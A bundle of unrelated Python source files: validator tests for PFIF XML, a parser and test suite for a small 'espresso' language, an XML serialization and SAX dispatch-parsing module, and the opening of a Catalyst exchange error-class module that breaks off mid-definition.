self.assertEqual(len(validator.validate_extraneous_fields()), 2)
# main application + run_validations
def test_run_validations_without_errors(self):
"""run_validations should return an empty message list when passed a valid
file"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.run_validations()), 0)
def test_run_validations_with_errors(self):
"""run_validations should return a message list with three errors when the
root doesn't have a mandatory child and there are two duplicate nodes."""
validator = self.set_up_validator(PfifXml.XML_TWO_DUPLICATE_NO_CHILD)
self.assertEqual(len(validator.run_validations()), 3)
def test_main_no_args(self):
"""main should give an assertion if it is given the wrong number of args."""
old_argv = sys.argv
sys.argv = ['pfif_validator.py']
self.assertRaises(Exception, pfif_validator.main)
sys.argv = old_argv
def test_main(self):
"""main should not raise an exception under normal circumstances."""
old_argv = sys.argv
old_stdout = sys.stdout
sys.argv = ['pfif_validator.py', 'mocked_file']
sys.stdout = StringIO('')
utils.set_file_for_test(StringIO(PfifXml.XML_11_FULL))
pfif_validator.main()
self.assertFalse('all_messages' in sys.stdout.getvalue())
sys.stdout = old_stdout
sys.argv = old_argv
# line numbers
def test_line_numbers(self):
"""After initialization, all elements in the tree should have line
numbers in the map."""
validator = self.set_up_validator(PfifXml.XML_FULL_12)
nodes = validator.tree.get_all_persons()
nodes.extend(validator.tree.get_all_notes())
for node in nodes:
self.assertTrue(node in validator.tree.line_numbers)
for child in node.getchildren():
self.assertTrue(child in validator.tree.line_numbers)
# unicode
def test_unicode_works(self):
"""none of the validations should fail when processing a field that includes
unicode text."""
validator = self.set_up_validator(PfifXml.XML_UNICODE_12)
messages = validator.run_validations()
validator.validator_messages_to_str(messages)
self.assertEqual(len(messages), 0)
if __name__ == '__main__':
unittest.main()
|
|
"""Parsing espresso files"""
from e_nodes import *
from e_error import ParseError
from e_input import Input
from e_operators import *
def parse_string_literal(input_handler, end_ch):
string = ""
while True:
if input_handler.eof():
raise ParseError(input_handler, "end of input_handler inside string literal")
ch = input_handler.read_ch()
if ch == end_ch:
break
if ch == '\r' or ch == '\n':
raise ParseError(input_handler, "newline in string literal")
string += ch
return StringExpr(string)
def parse_float(input_handler, literal):
"""Parse a float"""
while True:
next_ch = input_handler.peek_ch()
if next_ch.isdigit() or next_ch == 'e' or next_ch == '.':
literal += input_handler.read_ch()
else:
break
input_handler.expect('f')
return FloatExpr(literal)
def parse_num(input_handler):
"""Parse a number"""
literal = ""
while True:
ch = input_handler.read_ch()
if not ch.isdigit():
raise ParseError(input_handler, "expected digit")
literal += ch
if not input_handler.peek_ch().isdigit():
break
if input_handler.peek_ch() == '.' or input_handler.peek_ch() == 'e':
return parse_float(input_handler, literal)
if len(literal) > 64:
raise ParseError(input_handler, "int is too long")
return IntExpr(literal)
def parse_obj_literal(input_handler):
"""Parsing an object literal"""
field_names = []
val_exprs = []
while True:
if input_handler.match_ws('}'):
break
field = parse_ident_expr(input_handler)
input_handler.expect_ws(':')
expr = parse_expr(input_handler)
field_names.append(field)
val_exprs.append(expr)
if input_handler.match_ws('}'):
break
input_handler.expect_ws(',')
return ObjectExpr(field_names, val_exprs)
def parse_expr_list(input_handler, end_str):
"""Parsing a list of expression"""
exprs = []
while True:
if input_handler.match_ws(end_str):
break
expr = parse_expr(input_handler)
exprs.append(expr)
if input_handler.match_ws(end_str):
break
input_handler.expect_ws(',')
return exprs
def parse_ident_expr(input_handler):
"""Parse and identifier"""
ident = ""
first_ch = input_handler.peek_ch()
if first_ch != '_' and not first_ch.isalpha():
raise ParseError(input_handler, "invalid first character for identifier")
while True:
ch = input_handler.peek_ch()
if not ch.isalnum() and ch != '_':
break
ident += input_handler.read_ch()
if len(ident) == 0:
raise ParseError(input_handler, "invalid identifier")
return ident
def parse_fun_expr(input_handler):
"""Parsing a function expression"""
input_handler.expect_ws('(')
params = []
while True:
if input_handler.match_ws(')'):
break
param = parse_ident_expr(input_handler)
params.append(param)
if input_handler.match_ws(')'):
break
input_handler.expect_ws(',')
input_handler.expect_ws('{')
body = parse_block_stmt(input_handler, '}')
return FunExpr(None, body, params)
def parse_expr_prec(input_handler, min_prec):
"""
The first call has min precedence 0
Each call loops to grab everything of the current precedence or
greater and builds a left-sided subtree out of it, associating
operators to their left operand
If an operator has less than the current precedence, the loop
breaks, returning us to the previous loop level, this will attach
the atom to the previous operator (on the right)
If an operator has the mininum precedence or greater, it will
associate the current atom to its left and then parse the rhs
"""
lhs_expr = parse_atom(input_handler)
while True:
input_handler.eat_ws()
op = match_op(input_handler, min_prec, False)
if op is None:
break
next_min_prec = op.prec
if op.assoc == 'l':
if op.close_str is not None:
next_min_prec = 0
else:
next_min_prec = op.prec + 1
if op == OP_CALL:
arg_exprs = parse_expr_list(input_handler, ')')
lhs_expr = CallExpr(lhs_expr, arg_exprs)
elif op.arity == 2:
rhs_expr = parse_expr_prec(input_handler, next_min_prec)
lhs_expr = BinOpExpr(op, lhs_expr, rhs_expr)
if op.close_str is not None and not input_handler.match_ws(op.close_str):
raise ParseError(input_handler, "expecting: " + op.close_str)
else:
raise ParseError(input_handler, "unhandled operator")
return lhs_expr
def parse_expr(input_handler):
"""Parse an expression"""
return parse_expr_prec(input_handler, 0)
def match_op(input_handler, min_prec, pre_unary):
"""matching operators"""
ch = input_handler.peek_ch()
op = None
if ch == '(':
op = OP_CALL
elif ch == '+':
op = OP_ADD
elif ch == '-':
if pre_unary:
op = OP_NEG
else:
op = OP_SUB
elif ch == '*':
op = OP_MUL
elif ch == '/':
op = OP_DIV
elif ch == '%':
op = OP_MOD
elif ch == '<':
if input_handler.next("<="):
op = OP_LE
elif input_handler.next("<"):
op = OP_LT
elif ch == '>':
if input_handler.next(">="):
op = OP_GE
elif input_handler.next(">"):
op = OP_GT
elif ch == '=':
op = OP_EQ
elif ch == ':':
if input_handler.next(":="):
op = OP_ASSIGN
elif ch == '!':
if input_handler.next('!='):
op = OP_NE
elif ch == 'n':
if input_handler.next('not'):
op = OP_NOT
elif ch == 'o':
if input_handler.next('or'):
op = OP_OR
elif ch == 'a':
if input_handler.next('and'):
op = OP_AND
elif ch == 't':
if input_handler.next('typeof'):
op = OP_TYPEOF
if op is not None:
if op.prec < min_prec or (pre_unary and op.arity != 1) or (pre_unary and op.assoc != 'r'):
return None
assert input_handler.match(op.operator)
return op
def parse_atom(input_handler):
"""Parsing an atomic expression"""
input_handler.eat_ws()
if input_handler.peek_ch().isdigit():
return parse_num(input_handler)
if input_handler.match('"'):
return parse_string_literal(input_handler, '"')
if input_handler.match("'"):
return parse_string_literal(input_handler, "'")
if input_handler.match('['):
return ArrayExpr(parse_expr_list(input_handler, "]"))
if input_handler.match("{"):
return parse_obj_literal(input_handler)
if input_handler.match("("):
expr = parse_expr(input_handler)
input_handler.expect_ws(")")
return expr
op = match_op(input_handler, 0, True)
if op is not None:
expr = parse_expr_prec(input_handler, op.prec)
return UnOpExpr(op, expr)
if input_handler.peek_ch().isalnum():
if input_handler.match_kw("fun"):
return parse_fun_expr(input_handler)
return IdentExpr(parse_ident_expr(input_handler))
if input_handler.match("$"):
op_name = parse_ident_expr(input_handler)
input_handler.expect('(')
arg_exprs = parse_expr_list(input_handler, ')')
return IRExpr(op_name, arg_exprs)
raise ParseError(input_handler, "invalid expression")
def parse_stmt(input_handler):
"""Parse a statement"""
# eat whitespace
input_handler.eat_ws()
# a block statement
if input_handler.match("{"):
return parse_block_stmt(input_handler, "}")
# a variable statement
if input_handler.match_kw("let"):
input_handler.eat_ws()
ident = parse_ident_expr(input_handler)
input_handler.expect_ws(":=")
init_expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return DeclStmt(ident, init_expr)
if input_handler.match_kw("if"):
return parse_if_stmt(input_handler)
if input_handler.match_kw("assert"):
input_handler.expect_ws("(")
test_expr = parse_expr(input_handler)
err_msg = StringExpr("assertion failed")
if input_handler.match_ws(","):
err_msg = parse_expr(input_handler)
input_handler.expect_ws(")")
input_handler.expect(";")
return IfStmt(
test_expr,
BlockStmt([]),
IRStmt("abort", [err_msg])
)
if input_handler.match_kw("return"):
if input_handler.match_ws(";"):
return ReturnStmt(IdentExpr("null"))
expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return ReturnStmt(expr)
if input_handler.match_kw("import"):
input_handler.expect_ws("(")
paths = []
while True:
if input_handler.match_ws(")"):
break
if input_handler.match_ws("'"):
path = parse_string_literal(input_handler, "'")
name = None
input_handler.expect_ws("as")
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
paths.append((path, name))
else:
input_handler.expect_ws('"')
path = parse_string_literal(input_handler, '"')
name = None
input_handler.expect_ws("as")
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
paths.append((path, name))
if input_handler.match_ws(")"):
break
input_handler.expect_ws(",")
return ImportStmt(paths)
if input_handler.match_kw("export"):
input_handler.expect_ws("(")
names = []
while True:
if input_handler.match_ws(")"):
break
input_handler.eat_ws()
name = parse_ident_expr(input_handler)
names.append(name)
if input_handler.match_ws(")"):
break
input_handler.expect_ws(',')
return ExportStmt(names)
if input_handler.match("$"):
op_name = parse_ident_expr(input_handler)
input_handler.expect("(")
arg_exprs = parse_expr_list(input_handler, ")")
input_handler.expect_ws(";")
return IRStmt(op_name, arg_exprs)
expr = parse_expr(input_handler)
input_handler.expect_ws(";")
return ExprStmt(expr)
def parse_if_stmt(input_handler):
"""Parse an if statement"""
input_handler.expect_ws('(')
test_expr = parse_expr(input_handler)
input_handler.expect(')')
then_stmt = parse_stmt(input_handler)
else_stmt = BlockStmt([])
if input_handler.match_kw("else"):
else_stmt = parse_stmt(input_handler)
return IfStmt(test_expr, then_stmt, else_stmt)
def parse_block_stmt(input_handler, end_str):
"""Parse a block statement"""
stmts = []
while True:
input_handler.eat_ws()
if end_str == "" and input_handler.eof() or end_str != "" and input_handler.match(end_str):
break
stmt = parse_stmt(input_handler)
stmts.append(stmt)
return BlockStmt(stmts)
def parse_unit(input_handler):
"""Parse a source unit from an input_handler object"""
if input_handler.match('#language'):
input_handler.expect_ws('"')
while True:
if input_handler.eof():
raise ParseError(input_handler, "end of input_handler inside language declaration")
if input_handler.read_ch() == '"':
break
block_stmt = parse_block_stmt(input_handler, "")
return FunExpr("unit", block_stmt, [])
def parse_string(string, src_name):
"""Parse a string and returns a function"""
input_handler_handler = Input(src_name, string)
return parse_unit(input_handler_handler)
def test_parse(string):
"""Testing success"""
parse_string(string, "test success")
def test_parse_fail(string):
"""Testing failure"""
try:
parse_string(string, "test fail")
except ParseError:
return
raise Exception("Parsing did not fail for: " + string)
def test_parser():
"""Testing"""
print("parser tests")
# ids
test_parse("foo;")
test_parse(" foo ;")
test_parse(" foo;")
# literals
test_parse("42;")
test_parse("42.42f;")
test_parse("42e42f;")
test_parse("42.4e4f;")
test_parse('"test me!";')
test_parse('"test me! \'lol\'";')
test_parse("'test \\n newline';")
test_parse("true;")
test_parse("false;")
test_parse_fail("invalid \\iesc")
# arrays
test_parse("[];")
test_parse("[1,2];")
test_parse("[1,e];")
test_parse("['aa', 'bb', 4.4f];")
test_parse("[1, \n3];")
test_parse_fail("[,];")
# objects
test_parse("let a := {a:2, b:'c'};")
test_parse_fail("a := {,}")
# Comments
test_parse("1; // comment")
test_parse("[ 1//comment\n,a ];")
test_parse_fail("1; // comment\n#1")
# Unary and binary expressions
test_parse("-1;")
test_parse("-x + 2;")
test_parse("x + -1;")
test_parse("a + b;")
test_parse("a + b + c;")
test_parse("a + b - c;")
test_parse("a + b * c + d;")
test_parse("a or b or c;")
test_parse("(a);")
test_parse("(b ) ;")
test_parse("(a + b);")
test_parse("(a + (b + c));")
test_parse("((a + b) + c);")
test_parse("(a + b) * (c + d);")
test_parse_fail("*a;")
test_parse_fail("a*;")
test_parse_fail("a # b;")
test_parse_fail("a +;")
test_parse_fail("a + b # c;")
test_parse_fail("(a;")
test_parse_fail("(a + b))")
test_parse_fail("((a + b)")
# Assignment
test_parse("x := 1;")
test_parse("x := -1;")
test_parse("x := y := 1;")
test_parse("let x := 3;")
test_parse_fail("let")
test_parse_fail("var")
test_parse_fail("var x")
test_parse_fail("var x:=")
test_parse_fail("let +")
test_parse_fail("let 3")
# Call expressions
test_parse("a();")
test_parse("a(b);")
test_parse("a(b,c);")
test_parse("a(b,c+1);")
test_parse("a(b,c+1,);")
test_parse("x + a(b,c+1);")
test_parse("x + a(b,c+1) + y;")
test_parse("a(); b();")
test_parse_fail("a(b c+1);")
# package import
test_parse("import( 'package/math' as math )")
test_parse("import( 'package/math' as m )")
test_parse_fail("import( '1' as one, '2', '3' as three )")
# export statement
test_parse("export(a, b)")
test_parse("export(c)")
test_parse_fail("export(1)")
test_parse_fail("export('a')")
# Inline IR
test_parse("let s := $add_i32(1, 2);")
test_parse("$array_push(arr, val);")
# If statements
test_parse("if (true) {x + 1;}")
test_parse("if (x) {x+1;} else {y+1;}")
# Assert statement
test_parse("assert(x);")
test_parse("assert(x, 'foo');")
test_parse_fail("assert(x, 'foo', z);")
# Function expression
test_parse("fun () { return 0; }; ")
test_parse("fun (x) {return x;};")
test_parse("fun (x) { return x; };")
test_parse("fun (x,y) { return x; };")
test_parse("fun (x,y,) { return x; };")
test_parse("fun (x,y) { return x+y; };")
test_parse_fail("fun (x,y)")
# Sequence/block expression
test_parse("{ 1; 2; }")
test_parse("fun (x) { print(x); print(y); };")
test_parse("fun (x) { let y := x + 1; print(y); };")
test_parse_fail("{ a, }")
test_parse_fail("{ a, b }")
test_parse_fail("fun () { a, };")
# There is no empty statement
test_parse_fail(";")
|
|
# -*- coding: utf-8 -*-
import os
import os.path
from StringIO import StringIO
from time import time
__all__ = ['Parser', 'IncrementalParser', 'DispatchParser']
import xml.dom as xd
import xml.dom.minidom as xdm
import xml.sax as xs
import xml.sax.handler as xsh
import xml.sax.saxutils as xss
from xml.sax.saxutils import quoteattr, escape, unescape
from bridge import Element, ENCODING, Attribute, PI, Comment, Document
from bridge.common import ANY_NAMESPACE
class Parser(object):
def __init__(self):
self.buffer = []
def __deserialize_fragment(self, current, parent):
if current.attributes:
for key in iter(current.attributes.keys()):
attr = current.attributes[key]
Attribute(attr.localName, attr.value,
attr.prefix, attr.namespaceURI, parent)
children_num = len(current.childNodes)
children = iter(current.childNodes)
for child in children:
nt = child.nodeType
if nt == xd.Node.TEXT_NODE:
data = escape(child.data)
if children_num == 1:
parent.xml_text = data
else:
parent.xml_children.append(data)
elif nt == xd.Node.CDATA_SECTION_NODE:
parent.as_cdata = True
data = child.data
if children_num == 1:
parent.xml_text = data
else:
parent.xml_children.append(data)
elif nt == xd.Node.COMMENT_NODE:
Comment(data=unicode(child.data), parent=parent)
elif nt == xd.Node.PROCESSING_INSTRUCTION_NODE:
PI(target=unicode(child.target), data=unicode(child.data), parent=parent)
elif nt == xd.Node.ELEMENT_NODE:
element = Element(name=child.localName, prefix=child.prefix,
namespace=child.namespaceURI, parent=parent)
self.__deserialize_fragment(child, element)
def __qname(self, name, prefix=None):
if prefix:
return "%s:%s" % (prefix, name)
return name
def __attrs(self, node):
for attr_ns, attr_name in iter(node.xml_attributes):
if attr_ns == xd.XMLNS_NAMESPACE and attr_name == 'xmlns':
continue
attr = node.xml_attributes[(attr_ns, attr_name)]
ns = attr.xml_ns
prefix = attr.xml_prefix
name = attr.xml_name
yield ns, name, prefix, attr.xml_text or ''
def __append_namespace(self, prefix, ns):
if prefix:
self.buffer.append(' xmlns:%s="%s"' % (prefix, ns))
elif ns is not None:
self.buffer.append(' xmlns="%s"' % (ns, ))
def __build_ns_map(self, ns_map, element):
for child in element.xml_children:
if isinstance(child, Element):
if child.xml_ns not in ns_map:
ns_map[child.xml_prefix] = child.xml_ns
for attr_ns, attr_name in child.xml_attributes:
if attr_ns not in ns_map:
ns_map[attr_ns] = child.xml_attributes[(attr_ns, attr_name)].xml_prefix
def __is_known(self, ns_map, prefix, ns):
if prefix in ns_map and ns_map[prefix] == ns:
return True
ns_map[prefix] = ns
return False
def __append_text(self, text, as_cdata):
if as_cdata:
self.buffer.append('<![CDATA[')
self.buffer.append(text)
if as_cdata:
self.buffer.append(']]>')
def __serialize_element(self, element, parent_ns_map=None):
for child in iter(element.xml_children):
if isinstance(child, basestring):
child = child.strip().strip('\n').strip('\r\n')
if not child:
continue
self.__append_text(child, element.as_cdata)
elif isinstance(child, Element):
ns_map = {}
ns_map.update(parent_ns_map or {})
prefix = ns = name = None
if child.xml_prefix:
prefix = child.xml_prefix
if child.xml_ns:
ns = child.xml_ns
name = child.xml_name
qname = self.__qname(name, prefix=prefix)
self.buffer.append('<%s' % qname)
if not self.__is_known(ns_map, prefix, ns):
self.__append_namespace(prefix, ns)
for ns, name, prefix, value in self.__attrs(child):
if ns is None:
pass
elif ns == xd.XML_NAMESPACE:
name = 'xml:%s' % name
elif ns == xd.XMLNS_NAMESPACE:
if not self.__is_known(ns_map, name, value):
self.__append_namespace(name, value)
continue
else:
name = '%s:%s' % (prefix, name)
if not self.__is_known(ns_map, prefix, ns):
self.__append_namespace(prefix, ns)
self.buffer.append(' %s=%s' % (name, quoteattr(value)))
if child.xml_text or child.xml_children:
self.buffer.append('>')
if child.xml_text:
self.__append_text(child.xml_text, child.as_cdata)
if child.xml_children:
self.__serialize_element(child, ns_map)
self.buffer.append('</%s>' % (qname, ))
else:
self.buffer.append(' />')
elif isinstance(child, Comment):
self.buffer.append('<!--%s-->\n' % (child.data,))
elif isinstance(child, PI):
self.buffer.append('<?%s %s?>\n' % (child.target, child.data))
def serialize(self, document, indent=False, encoding=ENCODING, prefixes=None, omit_declaration=False):
if not isinstance(document, Document):
root = document
document = Document()
document.xml_children.append(root)
self.__serialize_element(document)
if not omit_declaration:
self.buffer.insert(0, '<?xml version="1.0" encoding="%s"?>%s' % (encoding, os.linesep))
content = ''.join(self.buffer)
self.buffer = []
if indent:
return content.rstrip(os.linesep).encode(encoding)
return content.encode(encoding)
def deserialize(self, source, prefixes=None, strict=False):
doc = None
if isinstance(source, basestring):
if os.path.exists(source):
doc = xdm.parse(source)
else:
doc = xdm.parseString(source)
elif hasattr(source, 'read'):
doc = xdm.parse(source)
document = Document()
self.__deserialize_fragment(doc, document)
if doc:
try:
doc.unlink()
except KeyError:
pass
return document
import xml.sax as xs
import xml.sax.saxutils as xss
from xml.parsers import expat
try:
import cStringIO as StringIO
except ImportError:
import StringIO
from time import time
class IncrementalHandler(xss.XMLGenerator):
def __init__(self, out, encoding=ENCODING):
xss.XMLGenerator.__init__(self, out, encoding)
self._root = Document()
self._current_el = self._root
self._current_level = 0
self._as_cdata = False
def reset(self):
if self._root:
self._root.forget()
self._root = None
if self._current_el:
self._current_el.forget()
self._current_el = None
self._root = Document()
self._current_el = self._root
self._current_level = 0
def startDocument(self):
self._root = Document()
self._current_el = self._root
self._current_level = 0
self._as_cdata = False
# see http://www.xml.com/pub/a/2003/03/10/python.html
def _split_qname(self, qname):
qname_split = qname.split(':')
if len(qname_split) == 2:
prefix, local = qname_split
else:
prefix = None
local = qname_split
return prefix, local
def processingInstruction(self, target, data):
PI(target, data, self._current_el)
def startElementNS(self, name, qname, attrs):
#print "$%s%s: %f" % (" " * self._current_level, name, time())
uri, local_name = name
prefix = None
if uri and uri in self._current_context:
prefix = self._current_context[uri]
#print "$$%s%s: %f" % (" " * self._current_level, name, time())
e = Element(local_name, prefix=prefix, namespace=uri, parent=self._current_el)
#print "$$$%s%s: %f" % (" " * self._current_level, name, time())
for name, value in iter(attrs.items()):
(namespace, local_name) = name
qname = attrs.getQNameByName(name)
prefix = self._split_qname(qname)[0]
Attribute(local_name, value, prefix, namespace, e)
#print "$$$$%s%s: %f" % (" " * self._current_level, name, time())
self._current_el = e
self._current_level = self._current_level + 1
#print "$$$$$%s%s: %f" % (" " * self._current_level, name, time())
def endElementNS(self, name, qname):
self._current_level = current_level = self._current_level - 1
self._current_el = self._current_el.xml_parent
def characters(self, content):
self._current_el.as_cdata = self._as_cdata
if not self._as_cdata and not self._current_el.xml_text:
self._current_el.xml_text = content
else:
self._current_el.xml_children.append(content)
self._as_cdata = False
def comment(self, data):
Comment(data, self._current_el)
def startCDATA(self):
self._as_cdata = True
def endCDATA(self):
pass
def startDTD(self, name, public_id, system_id):
pass
def endDTD(self):
pass
def doc(self):
"""Returns the root Document instance of the parsed
document. You have to call the close() method of the
parser first.
"""
return self._root
class IncrementalParser(object):
def __init__(self, out=None, encoding=ENCODING):
self.parser = xs.make_parser()
self.parser.setFeature(xs.handler.feature_namespaces, True)
if not out:
out = StringIO.StringIO()
self.out = out
self.handler = IncrementalHandler(self.out, encoding)
self.parser.setContentHandler(self.handler)
self.parser.setProperty(xs.handler.property_lexical_handler, self.handler)
def feed(self, chunk):
self.parser.feed(chunk)
def reset(self):
self.handler.reset()
self.parser.reset()
class DispatchHandler(IncrementalHandler):
def __init__(self, out, encoding='UTF-8'):
IncrementalHandler.__init__(self, out=None, encoding=ENCODING)
"""This handler allows the incremental parsing of an XML document
while providing simple ways to dispatch at precise point of the
parsing back to the caller.
Here's an example:
>>> from parser import DispatchParser
>>> p = DispatchParser()
>>> def dispatch(e):
... print e.xml()
...
>>> h.register_at_level(1, dispatch)
>>> p.feed('<r')
>>> p.feed('><b')
>>> p.feed('/></r>')
<?xml version="1.0" encoding="UTF-8"?>
<b xmlns=""></b>
Alternatively this can even be used as a generic parser. If you
don't need dispatching you simply call ``disable_dispatching``.
>>> from parser import DispatchParser
>>> p = DispatchParser()
>>> h.disable_dispatching()
>>> p.feed('<r><b/></r>')
>>> h.doc()
<r element at 0xb7ca99ccL />
>>> h.doc().xml(omit_declaration=True)
'<r xmlns=""><b></b></r>'
Note that this handler has limitations as it doesn't
manage DTDs.
Note also that this class is not thread-safe.
"""
self._level_dispatchers = {}
self._element_dispatchers = {}
self._element_level_dispatchers = {}
self._path_dispatchers = {}
self.default_dispatcher = None
self.default_dispatcher_start_element = None
self.disable_dispatching()
def register_default(self, handler):
self.default_dispatcher = handler
def unregister_default(self):
self.default_dispatcher = None
def register_default_start_element(self, handler):
self.default_dispatcher_start_element = handler
def unregister_default_start_element(self):
self.default_dispatcher_start_element = None
def disable_dispatching(self):
self.default_dispatcher = None
self.default_dispatcher_start_element = None
self.enable_level_dispatching = False
self.enable_element_dispatching = False
self.enable_element_by_level_dispatching = False
self.enable_dispatching_by_path = False
def enable_dispatching(self):
self.enable_level_dispatching = True
self.enable_element_dispatching = True
self.enable_element_by_level_dispatching = True
self.enable_dispatching_by_path = True
def register_at_level(self, level, dispatcher):
"""Registers a dispatcher at a given level within the
XML tree of elements being built.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.enable_level_dispatching = True
self._level_dispatchers[level] = dispatcher
def unregister_at_level(self, level):
"""Unregisters a dispatcher at a given level
"""
if level in self._level_dispatchers:
del self._level_dispatchers[level]
if len(self._level_dispatchers) == 0:
self.enable_level_dispatching = False
def register_on_element(self, local_name, dispatcher, namespace=None):
"""Registers a dispatcher on a given element met during
the parsing.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.enable_element_dispatching = True
self._element_dispatchers[(namespace, local_name)] = dispatcher
def unregister_on_element(self, local_name, namespace=None):
"""Unregisters a dispatcher for a specific element.
"""
key = (namespace, local_name)
if key in self._element_dispatchers:
del self._element_dispatchers[key]
if len(self._element_dispatchers) == 0:
self.enable_element_dispatching = False
def register_on_element_per_level(self, local_name, level, dispatcher, namespace=None):
"""Registers a dispatcher at a given level within the
XML tree of elements being built as well as for a
specific element.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.enable_element_by_level_dispatching = True
self._element_level_dispatchers[(level, (namespace, local_name))] = dispatcher
def unregister_on_element_per_level(self, local_name, level, namespace=None):
"""Unregisters a dispatcher at a given level for a specific
element.
"""
key = (level, (namespace, local_name))
if key in self._element_level_dispatchers:
del self._element_level_dispatchers[key]
if len(self._element_level_dispatchers) == 0:
self.enable_element_by_level_dispatching = False
def register_by_path(self, path, dispatcher):
self.enable_dispatching_by_path = True
self._path_dispatchers[path] = dispatcher
def unregister_by_path(self, path):
if path in self._path_dispatchers:
del self._path_dispatchers[path]
if len(self._path_dispatchers) == 0:
self.enable_dispatching_by_path = False
def startElementNS(self, name, qname, attrs):
#print "%s: %f" % (name, time())
IncrementalHandler.startElementNS(self, name, qname, attrs)
if self.default_dispatcher_start_element:
self.default_dispatcher_start_element(self._current_el)
def endElementNS(self, name, qname):
self._current_level = current_level = self._current_level - 1
if not self._current_el:
return
current_element = self._current_el
parent_element = self._current_el.xml_parent
dispatched = False
if self.enable_element_dispatching:
pattern = (current_element.xml_ns, current_element.xml_name)
if pattern in self._element_dispatchers:
self._element_dispatchers[pattern](current_element)
dispatched = True
if not dispatched and self.default_dispatcher:
self.default_dispatcher(current_element)
self._current_el = parent_element
class DispatchParser(object):
def __init__(self, out=None, encoding=ENCODING):
self.parser = xs.make_parser()
self.parser.setFeature(xs.handler.feature_namespaces, True)
if not out:
out = StringIO.StringIO()
self.out = out
self.handler = DispatchHandler(self.out, encoding)
self.parser.setContentHandler(self.handler)
self.parser.setProperty(xs.handler.property_lexical_handler, self.handler)
def feed(self, chunk):
self.parser.feed(chunk)
def register_default(self, handler):
self.handler.register_default(handler)
def unregister_default(self):
self.handler.unregister_default()
def register_default_start_element(self, handler):
self.handler.register_default_start_element(handler)
def unregister_default_start_element(self):
self.handler.unregister_default_start_element()
def reset(self):
self.handler.reset()
self.parser.reset()
def disable_dispatching(self):
self.handler.disable_dispatching()
def enable_dispatching(self):
self.handler.enable_dispatching()
def register_at_level(self, level, dispatcher):
"""Registers a dispatcher at a given level within the
XML tree of elements being built.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.handler.register_at_level(level, dispatcher)
def unregister_at_level(self, level):
"""Unregisters a dispatcher at a given level
"""
self.handler.unregister_at_level(level, dispatcher)
def register_on_element(self, local_name, dispatcher, namespace=None):
"""Registers a dispatcher on a given element met during
the parsing.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.handler.register_on_element(local_name, dispatcher, namespace)
def unregister_on_element(self, local_name, namespace=None):
"""Unregisters a dispatcher for a specific element.
"""
self.handler.unregister_on_element(local_name, namespace)
def register_on_element_per_level(self, local_name, level, dispatcher, namespace=None):
"""Registers a dispatcher at a given level within the
XML tree of elements being built as well as for a
specific element.
The ``level``, an integer, is zero-based. So the root
element of the XML tree is 0 and its direct children
are at level 1.
The ``local_name`` is the local name of the element. This
element can be namespaced if you provide the ``namespace``
parameter.
The ``dispatcher`` is a callable object only taking
one parameter, a Element instance.
"""
self.handler.register_on_element_per_level(local_name, level, dispatcher, namespace)
def unregister_on_element_per_level(self, local_name, level, namespace=None):
"""Unregisters a dispatcher at a given level for a specific
element.
"""
self.handler.unregister_on_element_per_level(local_name, level, namespace)
def register_by_path(self, path, dispatcher):
self.handler.register_by_path(path, dispatcher)
def unregister_by_path(self, path):
self.handler.unregister_by_path(path)
|
|
import sys
import traceback
from catalyst.errors import ZiplineError
def silent_except_hook(exctype, excvalue, exctraceback):
if exctype in [PricingDataBeforeTradingError, PricingDataNotLoadedError,
SymbolNotFoundOnExchange, NoDataAvailableOnExchange,
ExchangeAuthEmpty]:
fn = traceback.extract_tb(exctraceback)[-1][0]
ln = traceback.extract_tb(exctraceback)[-1][1]
print("Error traceback: {1} (line {2})\n"
"{0.__name__}: {3}".format(exctype, fn, ln, excvalue))
else:
sys.__excepthook__(exctype, excvalue, exctraceback)
sys.excepthook = silent_except_hook
class ExchangeRequestError(ZiplineError):
msg = (
'Request failed: {error}'
).strip()
class ExchangeRequestErrorTooManyAttempts(ZiplineError):
msg = (
'Request failed: {error}, giving up after {attempts} attempts'
).strip()
class ExchangeBarDataError(ZiplineError):
msg = (
'Unable to retrieve bar data: {data_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangePortfolioDataError(ZiplineError):
msg = (
'Unable to retrieve portfolio data: {data_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangeTransactionError(ZiplineError):
msg = (
'Unable to execute transaction: {transaction_type}, ' +
'giving up after {attempts} attempts: {error}'
).strip()
class ExchangeNotFoundError(ZiplineError):
msg = (
'Exchange {exchange_name} not found. Please specify exchanges '
'supported by Catalyst and verify spelling for accuracy.'
).strip()
class ExchangeAuthNotFound(ZiplineError):
msg = (
'Please create an auth.json file containing the api token and key for '
'exchange {exchange}. Place the file here: {filename}'
).strip()
class ExchangeAuthEmpty(ZiplineError):
msg = (
'Please enter your API token key and secret for exchange {exchange} '
'in the following file: {filename}'
).strip()
class RemoteAuthEmpty(ZiplineError):
msg = (
'Please enter your API token key and secret for the remote server '
'in the following file: {filename}'
).strip()
class ExchangeSymbolsNotFound(ZiplineError):
msg = (
'Unable to download or find a local copy of symbols.json for exchange '
'{exchange}. The file should be here: {filename}'
).strip()
class AlgoPickleNotFound(ZiplineError):
msg = (
'Pickle not found for algo {algo} in path {filename}'
).strip()
class InvalidHistoryFrequencyAlias(ZiplineError):
msg = (
'Invalid frequency alias {freq}. Valid suffixes are M (minute) '
'and D (day). For example, these aliases would be valid '
'1M, 5M, 1D.'
).strip()
class InvalidHistoryFrequencyError(ZiplineError):
msg = (
'Frequency {frequency} not supported by the exchange.'
).strip()
class UnsupportedHistoryFrequencyError(ZiplineError):
msg = (
